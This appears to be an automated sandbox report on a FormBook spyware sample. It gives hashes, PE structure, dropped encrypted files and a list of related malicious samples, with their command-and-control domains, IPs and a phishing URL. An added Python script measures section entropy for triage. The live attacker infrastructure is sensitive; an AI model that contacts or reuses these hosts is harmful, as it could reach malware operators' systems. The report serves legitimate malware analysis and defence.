Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: z6tNjJC614.exe (renamed because the original name is a hash value)
Original Sample Name: 2d6f1128b6b15116c20d67315344e79aaece8d0a636f2ddae9936b1949188dde.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@11/9
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 49
• Number of non-executed functions: 276
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size exceeded the maximum capacity and may be missing disassembly code.
                                                                    No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
203.161.43.228
  ek8LkB2Cgo.exe | malicious | FormBook | www.futurorks.xyz/cpty/
  PAYMENT_ADVICE.exe | malicious | FormBook | www.smartguide.website/idns/
  CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | www.connecty.live/6urf/
  CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | www.connecty.live/6urf/
  DOC_114542366.vbe | malicious | FormBook | www.connecty.live/q6ws/?KV=2RCZf5GiD+fToLXcMHisxCqwWbc28bp5zmUuGnuHZcsPDzCWfzFSI1Df4pF2LDKbQ3OqnVWPrFqSO4182xFWIWWOBmKrBRiY7XTQRir+3P1LJShw3pPG+Dk=&Wno=a0qDq
  PO2-2401-0016 (TR).exe | malicious | FormBook | www.quilo.life/ftr3/
  PASU5160894680 DOCS.scr.exe | malicious | FormBook | www.lyxor.top/top4/
  Purchase Order TE- 00011-7777.exe | malicious | FormBook | www.quilo.life/ftr3/
  Payment confirmation 20240911.exe | malicious | FormBook | www.quilo.life/ftr3/
  PO 09110124 EXPRESS SYSTEM-SESB24066.exe | malicious | FormBook | www.quilo.life/ftr3/
13.248.169.48
  rACq8Eaix6.exe | malicious | FormBook | www.lirio.shop/qp0h/
  ydJaT4b5N8.exe | malicious | FormBook | www.10000.space/3zfl/
  n2pGr8w21V.exe | malicious | FormBook | www.lovel.shop/rxts/
  PGK60fNNCZ.exe | malicious | FormBook | www.aktmarket.xyz/wb7v/
  02Eh1ah35H.exe | malicious | FormBook, GuLoader | www.remedies.pro/a42x/
  zAg7xx1vKI.exe | malicious | FormBook | www.aktmarket.xyz/wb7v/
  SpCuEoekPa.exe | malicious | FormBook | www.sfantulandrei.info/wvsm/
  suBpo1g13Q.exe | malicious | FormBook | www.optimismbank.xyz/98j3/
  e47m9W6JGQ.exe | malicious | FormBook | www.bcg.services/5onp/
  25IvlOVEB1.exe | malicious | FormBook | www.shipley.group/wfhx/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
all.wjscdn.com
  5CTbduoXq4.exe | malicious | FormBook | 154.205.159.116
  0Wu31IhwGO.exe | malicious | FormBook | 154.205.156.26
  gKvjKMCUfq.exe | malicious | FormBook | 154.205.156.26
  aBEh0fsi2c.exe | malicious | FormBook | 154.90.58.209
  ORDER-401.exe | malicious | FormBook | 154.205.159.116
  01152-11-12-24.exe | malicious | FormBook | 154.90.58.209
  DRAFT COPY BL, CI & PL.exe | malicious | FormBook | 154.90.58.209
  New Order.exe | malicious | FormBook | 154.90.35.240
  TNT Express Delivery Consignment AWD 87993766479.vbs | malicious | FormBook | 38.54.112.227
  Payment-251124.exe | malicious | FormBook | 154.205.159.116
ymx01.cn
  aBEh0fsi2c.exe | malicious | FormBook | 8.218.14.120
  ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader | 8.210.46.21
  CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 8.210.46.21
  CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 8.210.46.21
www.zriaraem-skiry.sbs
  CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 172.67.159.61
  CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 104.21.42.77
www.50food.com
  OVZizpEU7Q.exe | malicious | FormBook | 147.255.21.187
  CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 147.255.21.187
  CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 147.255.21.187
Match | Associated Sample Name / URL | Detection | Threat Name | Context
VNPT-AS-VNVNPTCorpVN
  1N6ZpdYnU3.exe | malicious | FormBook | 203.161.49.193
  02Eh1ah35H.exe | malicious | FormBook, GuLoader | 202.92.5.23
  suBpo1g13Q.exe | malicious | FormBook | 202.92.5.23
  frosty.ppc.elf | malicious | Mirai | 123.29.161.162
  sora.arm.elf | malicious | Mirai | 14.178.148.126
  5.elf | malicious | Unknown | 14.170.79.162
  3.elf | malicious | Unknown | 123.30.26.194
  armv7l.elf | malicious | Unknown | 113.164.118.195
  http://abdullaksa.com/fetching//index.xml#?email=Z2xhbGlja2VyQGhpbGNvcnAuY29t | malicious | EvilProxy, HTMLPhisher | 203.161.57.139
  5.elf | malicious | Unknown | 14.172.40.3
LINKNET-ID-APLinknetASNID
  ZcshRk2lgh.exe | malicious | FormBook | 103.21.221.4
  BcF3o0Egke.exe | malicious | FormBook | 103.21.221.4
  aBEh0fsi2c.exe | malicious | FormBook | 103.21.221.87
  sora.mpsl.elf | malicious | Unknown | 139.10.29.3
  arm4.elf | malicious | Mirai | 139.44.142.78
  momo.arm7.elf | malicious | Mirai | 139.41.98.162
  armv5l.elf | malicious | Mirai | 139.34.88.220
  DEMONS.ppc.elf | malicious | Unknown | 139.16.152.234
  loligang.arm.elf | malicious | Mirai | 139.10.78.207
  loligang.mpsl.elf | malicious | Mirai | 139.24.67.215
AMAZON-02US
  5.elf | malicious | Unknown | 44.238.49.226
  rACq8Eaix6.exe | malicious | FormBook | 13.248.169.48
  ty1nyFUMlo.exe | malicious | Snake Keylogger, VIP Keylogger | 3.130.71.34
  plZuPtZoTk.exe | malicious | FormBook | 54.67.87.110
  ARMV4L.elf | malicious | Unknown | 54.171.230.55
  wSoShbuXnJ.exe | malicious | FormBook | 3.252.97.86
  BLv4mI7zzY.exe | malicious | FormBook | 13.228.81.39
  4.elf | malicious | Unknown | 18.131.143.241
  ydJaT4b5N8.exe | malicious | FormBook | 13.248.169.48
  BalphRTkPS.exe | malicious | FormBook | 18.139.62.226
CLOUDFLARENETUS
  b0cQukXPAl.exe | malicious | LummaC | 104.21.56.70
  x8M2g1Xxhz.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
  lrw6UNGsUC.exe | malicious | XWorm | 104.20.4.235
  Q7QR4k52HL.exe | malicious | LummaC | 104.21.48.1
  rACq8Eaix6.exe | malicious | FormBook | 104.21.88.139
  JWPRnfqs3n.exe | malicious | MassLogger RAT | 104.21.80.1
  xNuh0DUJaG.exe | malicious | LummaC | 104.21.80.1
  c7WJL1gt32.exe | malicious | GuLoader, MassLogger RAT | 104.21.80.1
  b6AGgIJ87g.exe | malicious | Snake Keylogger | 104.21.80.1
  ZaRP7yvL1J.exe | malicious | MassLogger RAT | 104.21.16.1
                                                                    Process:C:\Windows\SysWOW64\winver.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:modified
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\z6tNjJC614.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):288256
                                                                    Entropy (8bit):7.991592000330817
                                                                    Encrypted:true
                                                                    SSDEEP:6144:6tOCQciV6P3gJgEpdU2wk2l8MFvA4ojuAADg/cJVC0TE:peSAQJ1d0l8mVCgE
                                                                    MD5:6489C53A2B6FF91721223EBA74FF6B6C
                                                                    SHA1:A2B0B91BE87CF9A5B801B6FA2EC0D90FDE38E5BF
                                                                    SHA-256:86560DE4362D78F632F35CAAC8DFACC50676CAA33E54F1DF2EEE50190B178BAC
                                                                    SHA-512:CDB92C5D39D79AA35CE90A7AFD5D326FE7097E71921F91734729E05FF6FA071DDD20FA9650D86CE7310E9F470036EC7FB83B13E31B704F8A33E787FB556771AA
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:...YE3NOOWFY..YF.NOKWFYM.YF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF.NOKYY.CH.O.o.J..x. 05.>=$048 h:'] ?w$<m:,(.'!k...m%6"V`BF]bYMHYF3N6J^.d-/.{S).v7!.W....(.M..t9!.T..z9*../P&r+0.YMHYF3NO..FY.IXFO...WFYMHYF3.OIVMXFHY.7NOKWFYMHYv&NOKGFYM8]F3N.KWVYMH[F3HOKWFYMH_F3NOKWFY=LYF1NOKWFYOH..3N_KWVYMHYV3N_KWFYMHIF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHw2V6;KWF..LYF#NOK.BYMXYF3NOKWFYMHYF3nOK7FYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKW
                                                                    Process:C:\Users\user\Desktop\z6tNjJC614.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):288256
                                                                    Entropy (8bit):7.991592000330817
                                                                    Encrypted:true
                                                                    SSDEEP:6144:6tOCQciV6P3gJgEpdU2wk2l8MFvA4ojuAADg/cJVC0TE:peSAQJ1d0l8mVCgE
                                                                    MD5:6489C53A2B6FF91721223EBA74FF6B6C
                                                                    SHA1:A2B0B91BE87CF9A5B801B6FA2EC0D90FDE38E5BF
                                                                    SHA-256:86560DE4362D78F632F35CAAC8DFACC50676CAA33E54F1DF2EEE50190B178BAC
                                                                    SHA-512:CDB92C5D39D79AA35CE90A7AFD5D326FE7097E71921F91734729E05FF6FA071DDD20FA9650D86CE7310E9F470036EC7FB83B13E31B704F8A33E787FB556771AA
                                                                    Malicious:false
                                                                    Preview:...YE3NOOWFY..YF.NOKWFYM.YF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF.NOKYY.CH.O.o.J..x. 05.>=$048 h:'] ?w$<m:,(.'!k...m%6"V`BF]bYMHYF3N6J^.d-/.{S).v7!.W....(.M..t9!.T..z9*../P&r+0.YMHYF3NO..FY.IXFO...WFYMHYF3.OIVMXFHY.7NOKWFYMHYv&NOKGFYM8]F3N.KWVYMH[F3HOKWFYMH_F3NOKWFY=LYF1NOKWFYOH..3N_KWVYMHYV3N_KWFYMHIF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHw2V6;KWF..LYF#NOK.BYMXYF3NOKWFYMHYF3nOK7FYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKW
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.20804345871156
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:z6tNjJC614.exe
                                                                    File size:1'225'216 bytes
                                                                    MD5:043a47d412717c236558774c700bb159
                                                                    SHA1:bb9aada716669988693a17d9c559e683b194a5d1
                                                                    SHA256:2d6f1128b6b15116c20d67315344e79aaece8d0a636f2ddae9936b1949188dde
                                                                    SHA512:bbe37171bdb46d6b1dbfcf620d05a09a8e82b0091492549ed40d51a147a8382fc04d7fc13fd2231c5ad0b2e8bc811cde70a8b5a41240f7d9f60201a4e72d28d9
                                                                    SSDEEP:24576:2u6J33O0c+JY5UZ+XC0kGso6FaGEHL8EUwZIeq0orhjAsFLv1xWY:Yu0c++OCvkGs9FaGEHInwFq0o1jAWLOY
                                                                    TLSH:8B45CF22B3DDC360CB769173BF69B7016EBF38610630B95B2F980D7DA950161262D7A3
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                    Icon Hash:aaf3e3e3938382a0
                                                                    Entrypoint:0x427dcd
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x67506198 [Wed Dec 4 14:05:12 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:1
                                                                    File Version Major:5
                                                                    File Version Minor:1
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:1
                                                                    Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                    Instruction
                                                                    call 00007FCDB8E966BAh
                                                                    jmp 00007FCDB8E89484h
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    push edi
                                                                    push esi
                                                                    mov esi, dword ptr [esp+10h]
                                                                    mov ecx, dword ptr [esp+14h]
                                                                    mov edi, dword ptr [esp+0Ch]
                                                                    mov eax, ecx
                                                                    mov edx, ecx
                                                                    add eax, esi
                                                                    cmp edi, esi
                                                                    jbe 00007FCDB8E8960Ah
                                                                    cmp edi, eax
                                                                    jc 00007FCDB8E8996Eh
                                                                    bt dword ptr [004C31FCh], 01h
                                                                    jnc 00007FCDB8E89609h
                                                                    rep movsb
                                                                    jmp 00007FCDB8E8991Ch
                                                                    cmp ecx, 00000080h
                                                                    jc 00007FCDB8E897D4h
                                                                    mov eax, edi
                                                                    xor eax, esi
                                                                    test eax, 0000000Fh
                                                                    jne 00007FCDB8E89610h
                                                                    bt dword ptr [004BE324h], 01h
                                                                    jc 00007FCDB8E89AE0h
                                                                    bt dword ptr [004C31FCh], 00000000h
                                                                    jnc 00007FCDB8E897ADh
                                                                    test edi, 00000003h
                                                                    jne 00007FCDB8E897BEh
                                                                    test esi, 00000003h
                                                                    jne 00007FCDB8E8979Dh
                                                                    bt edi, 02h
                                                                    jnc 00007FCDB8E8960Fh
                                                                    mov eax, dword ptr [esi]
                                                                    sub ecx, 04h
                                                                    lea esi, dword ptr [esi+04h]
                                                                    mov dword ptr [edi], eax
                                                                    lea edi, dword ptr [edi+04h]
                                                                    bt edi, 03h
                                                                    jnc 00007FCDB8E89613h
                                                                    movq xmm1, qword ptr [esi]
                                                                    sub ecx, 08h
                                                                    lea esi, dword ptr [esi+08h]
                                                                    movq qword ptr [edi], xmm1
                                                                    lea edi, dword ptr [edi+08h]
                                                                    test esi, 00000007h
                                                                    je 00007FCDB8E89665h
                                                                    bt esi, 03h
                                                                    jnc 00007FCDB8E896B8h
                                                                    Programming Language:
                                                                    • [ASM] VS2013 build 21005
                                                                    • [ C ] VS2013 build 21005
                                                                    • [C++] VS2013 build 21005
                                                                    • [ C ] VS2008 SP1 build 30729
                                                                    • [IMP] VS2008 SP1 build 30729
                                                                    • [ASM] VS2013 UPD4 build 31101
                                                                    • [RES] VS2013 build 21005
                                                                    • [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x62960 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x12a000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x62960 | 0x62a00 | 7923f305310f6a80d7f748f4e405d99b | False | 0.9336333570975919 | data | 7.906698136949193 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x12a000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
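The entropy figures in this report are what an analyst checks first when deciding whether a PE carries a packed or encrypted payload: the .rsrc section sits at 7.906 while the code section is at 6.676, and the 288256-byte file dropped by z6tNjJC614.exe is at 7.99 and flagged Encrypted:true. The Python below is an added example and not part of the Joe Sandbox report. It walks a PE32 section table with the standard library only, computes the same 8-bit Shannon entropy per section from the raw bytes, and flags the three things worth a second look: entropy close to 8 bits per byte, sections that are both writable and executable, and a virtual size larger than the raw size. The PE image it runs on is constructed inline for demonstration and is not the analysed sample; the 7.0 threshold is an assumption, chosen to separate ordinary compiled code (typically 5 to 6.7) from compressed or encrypted data.

```python
"""Added example: PE32 section walk and per-section entropy (not report code)."""
import math
import struct
from collections import Counter

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
HIGH_ENTROPY = 7.0  # assumed triage threshold, bits per byte


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy: 0.0 for a constant buffer, 8.0 for a uniform one."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_sections(image: bytes):
    """Yield (name, va, vsize, raw_size, raw_ptr, characteristics) per section header."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PtrSymTab,
    # NumSymbols, SizeOfOptionalHeader, Characteristics
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, e_lfanew + 4)
    sec_off = e_lfanew + 4 + 20 + opt_size
    for i in range(nsec):
        # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", image, sec_off + i * 40)
        yield name.rstrip(b"\0").decode("ascii"), va, vsize, raw_size, raw_ptr, chars


def triage(image: bytes):
    """Per-section rows with the flags an analyst looks at first."""
    rows = []
    for name, va, vsize, raw_size, raw_ptr, chars in parse_sections(image):
        ent = shannon_entropy(image[raw_ptr:raw_ptr + raw_size])
        flags = []
        if ent >= HIGH_ENTROPY:
            flags.append("high-entropy")  # packed/encrypted payload candidate
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            flags.append("RWX")  # self-modifying or unpacking-in-place code
        if vsize > raw_size:
            flags.append("vsize>raw")  # normal for .data/.bss, suspicious for code
        rows.append({"name": name, "va": va, "vsize": vsize, "raw": raw_size,
                     "entropy": round(ent, 3), "flags": flags})
    return rows


def build_test_image() -> bytes:
    """Constructed minimal PE32: a low-entropy .text and a uniform (8.0) .rsrc."""
    text = bytes([0x90] * 200 + [0xC3] * 56)      # 256 bytes, two symbols only
    rsrc = bytes(range(256)) * 2                   # 512 bytes, every byte twice
    e_lfanew, opt_size = 0x80, 0xE0
    sec_off = e_lfanew + 4 + 20 + opt_size
    text_ptr, rsrc_ptr = 0x400, 0x600
    img = bytearray(rsrc_ptr + len(rsrc))
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, e_lfanew)
    img[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", img, e_lfanew + 4, 0x14C, 2, 0, 0, 0, opt_size, 0x102)
    struct.pack_into("<H", img, e_lfanew + 24, 0x10B)  # PE32 optional-header magic
    struct.pack_into("<8sIIIIIIHHI", img, sec_off, b".text", 0x100, 0x1000, 0x100,
                     text_ptr, 0, 0, 0, 0, 0x60000020)
    struct.pack_into("<8sIIIIIIHHI", img, sec_off + 40, b".rsrc", 0x200, 0x2000, 0x200,
                     rsrc_ptr, 0, 0, 0, 0, 0x40000040)
    img[text_ptr:text_ptr + len(text)] = text
    img[rsrc_ptr:rsrc_ptr + len(rsrc)] = rsrc
    return bytes(img)


if __name__ == "__main__":
    for row in triage(build_test_image()):
        print(row)
```

To use it on a real file, pass the result of `open(path, "rb").read()` to `triage`; the entropy column should then line up with the report's figures, since both measure the raw section bytes. A uniform byte distribution gives exactly 8.0, which is why anything above roughly 7.9 (the .rsrc section and the dropped blob here) is treated as compressed or encrypted rather than as code.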
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x59c25 | data | | | 1.0003291146815068
RT_GROUP_ICON | 0x1293e0 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x129458 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x12946c | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x129480 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x129494 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x129570 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                                                                    DLLImport
                                                                    WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                    VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
